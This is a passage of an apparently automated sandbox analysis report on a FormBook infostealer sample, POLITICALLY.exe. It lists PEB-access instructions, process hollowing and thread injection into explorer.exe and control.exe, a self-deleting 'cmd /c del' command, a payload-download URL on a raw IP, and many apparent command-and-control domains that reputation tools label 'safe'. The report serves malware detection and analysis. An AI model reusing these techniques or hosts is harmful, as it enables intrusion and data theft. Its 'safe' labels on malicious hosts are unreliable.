        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484F716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048BFF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048BFF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04824F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04824F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485E730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483EF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483FF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F8F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04829080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048690AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485F0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048BB8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048258EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04840050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04840050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F1074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E2073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485A185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484C182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04852990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048561A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048561A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A69A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048B41E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04829100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04829100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04829100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04844120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482C962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\Desktop\POLITICALLY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\POLITICALLY.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\POLITICALLY.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\POLITICALLY.exeThread register set: target process: 3440
        Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3440
        Queues an APC in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\POLITICALLY.exeThread APC queued: target process: C:\Windows\explorer.exe
        Sample uses process hollowing techniqueShow sources
        Source: C:\Users\user\Desktop\POLITICALLY.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 330000
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: explorer.exe, 00000013.00000000.521733147.0000000004F80000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000013.00000002.591577775.00000000008B8000.00000004.00000020.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000013.00000002.593225214.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
        Source: explorer.exe, 00000013.00000002.593225214.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221DC36 cpuid

        Stealing of Sensitive Information:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
        Yara detected Generic DropperShow sources
        Source: Yara matchFile source: Process Memory Space: POLITICALLY.exe PID: 6976, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: control.exe PID: 5548, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsShared Modules1Path InterceptionProcess Injection412Virtualization/Sandbox Evasion21OS Credential DumpingSecurity Software Discovery521Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection412LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSSystem Information Discovery211Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol111SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        POLITICALLY.exe17%VirustotalBrowse
        POLITICALLY.exe17%ReversingLabsWin32.Worm.Wbvb

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        23.2.control.exe.4fb518.1.unpack100%AviraTR/Dropper.GenDownload File
        23.2.control.exe.4d37960.4.unpack100%AviraTR/Dropper.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.6923599.com/olg8/0%Avira URL Cloudsafe
        http://www.moopyo.com0%Avira URL Cloudsafe
        http://www.easiersell.comReferer:0%Avira URL Cloudsafe
        http://www.artboxxstudio.com/olg8/0%Avira URL Cloudsafe
        http://www.wiseowldigital.comReferer:0%Avira URL Cloudsafe
        http://www.easiersell.com/olg8/www.assroyalty.club0%Avira URL Cloudsafe
        http://www.tuancai.net/olg8/0%Avira URL Cloudsafe
        http://www.policomercial.com/olg8/0%Avira URL Cloudsafe
        http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.com0%Avira URL Cloudsafe
        http://www.assroyalty.club0%Avira URL Cloudsafe
        http://www.6923599.comReferer:0%Avira URL Cloudsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.assroyalty.club/olg8/www.tuancai.net0%Avira URL Cloudsafe
        http://www.artboxxstudio.comReferer:0%Avira URL Cloudsafe
        http://www.nortier.cloud0%Avira URL Cloudsafe
        http://www.cunerier.comReferer:0%Avira URL Cloudsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.soakstress.xyz/olg8/www.moopyo.com0%Avira URL Cloudsafe
        http://111.90.149.46/bin_XNLhDlJvG218.bin0%Avira URL Cloudsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.prismatiq.techReferer:0%Avira URL Cloudsafe
        http://www.soakstress.xyz0%Avira URL Cloudsafe
        http://www.soakstress.xyz/olg8/0%Avira URL Cloudsafe
        http://www.onlinewomensclasses.com0%Avira URL Cloudsafe
        http://www.wiseowldigital.com/olg8/www.cunerier.com0%Avira URL Cloudsafe
        http://www.morgolf.com0%Avira URL Cloudsafe
        http://www.onlinewomensclasses.com/olg8/0%Avira URL Cloudsafe
        http://www.soakstress.xyzReferer:0%Avira URL Cloudsafe
        http://111.90.149.46/bin_XNLhDlJvG218.binb)0%Avira URL Cloudsafe
        http://www.6923599.com0%Avira URL Cloudsafe
        http://www.nortier.cloud/olg8/0%Avira URL Cloudsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.assroyalty.clubReferer:0%Avira URL Cloudsafe
        http://www.morgolf.com/olg8/www.easiersell.com0%Avira URL Cloudsafe
        http://www.tuancai.net0%Avira URL Cloudsafe
        http://www.6923599.com/olg8/www.wiseowldigital.com0%Avira URL Cloudsafe
        http://www.purplebean.companyReferer:0%Avira URL Cloudsafe
        http://www.onlinewomensclasses.com/olg8/www.policomercial.com0%Avira URL Cloudsafe
        http://www.cunerier.com0%Avira URL Cloudsafe
        http://www.cunerier.com/olg8/0%Avira URL Cloudsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.moopyo.com/olg8/0%Avira URL Cloudsafe
        http://www.auroraleathers.com/olg8/0%Avira URL Cloudsafe
        http://www.auroraleathers.comReferer:0%Avira URL Cloudsafe
        http://www.prismatiq.tech/olg8/www.soakstress.xyz0%Avira URL Cloudsafe
        http://www.tuancai.net/olg8/www.auroraleathers.com0%Avira URL Cloudsafe
        http://www.morgolf.com/olg8/0%Avira URL Cloudsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.prismatiq.tech0%Avira URL Cloudsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.assroyalty.club/olg8/0%Avira URL Cloudsafe
        http://www.tuancai.netReferer:0%Avira URL Cloudsafe
        http://www.easiersell.com/olg8/0%Avira URL Cloudsafe
        http://www.onlinewomensclasses.comReferer:0%Avira URL Cloudsafe
        http://www.policomercial.comReferer:0%Avira URL Cloudsafe
        http://www.wiseowldigital.com/olg8/0%Avira URL Cloudsafe
        http://www.nortier.cloudReferer:0%Avira URL Cloudsafe
        http://www.auroraleathers.com/olg8/www.artboxxstudio.com0%Avira URL Cloudsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.easiersell.com0%Avira URL Cloudsafe
        http://www.moopyo.comReferer:0%Avira URL Cloudsafe
        http://111.90.149.46/bin_XNLhDlJvG218.bin30%Avira URL Cloudsafe
        http://www.sakkal.com0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        http://www.auroraleathers.com0%Avira URL Cloudsafe
        http://111.90.149.46/bin_XNLhDlJvG218.bin/0%Avira URL Cloudsafe
        http://111.90.149.46/bin_XNLhDlJvG218.binw0%Avira URL Cloudsafe
        http://111.90.149.46/in_XNLhDlJvG218.bin0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://111.90.149.46/bin_XNLhDlJvG218.bintrue
        • Avira URL Cloud: safe
        		unknown
        www.nortier.cloud/olg8/true
        • Avira URL Cloud: safe
        		low

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.6923599.com/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.moopyo.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.easiersell.comReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.artboxxstudio.com/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.wiseowldigital.comReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.easiersell.com/olg8/www.assroyalty.clubexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.tuancai.net/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.policomercial.com/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.fontbureau.com/designersexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
          		high
          http://www.assroyalty.clubexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.6923599.comReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.sajatypeworks.comexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.assroyalty.club/olg8/www.tuancai.netexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.artboxxstudio.comReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.nortier.cloudexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.cunerier.comReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.soakstress.xyz/olg8/www.moopyo.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.urwpp.deDPleaseexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.zhongyicts.com.cnexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.prismatiq.techReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.soakstress.xyzexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.soakstress.xyz/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmpfalse
            		high
            http://www.onlinewomensclasses.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.wiseowldigital.com/olg8/www.cunerier.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.morgolf.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.onlinewomensclasses.com/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.soakstress.xyzReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://111.90.149.46/bin_XNLhDlJvG218.binb)POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.6923599.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.nortier.cloud/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.carterandcone.comlexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www.assroyalty.clubReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.morgolf.com/olg8/www.easiersell.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.tuancai.netexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
              		high
              http://www.6923599.com/olg8/www.wiseowldigital.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.purplebean.companyReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.onlinewomensclasses.com/olg8/www.policomercial.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.cunerier.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.fontbureau.com/designersGexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                		high
                http://www.cunerier.com/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.fontbureau.com/designers/?explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                  		high
                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
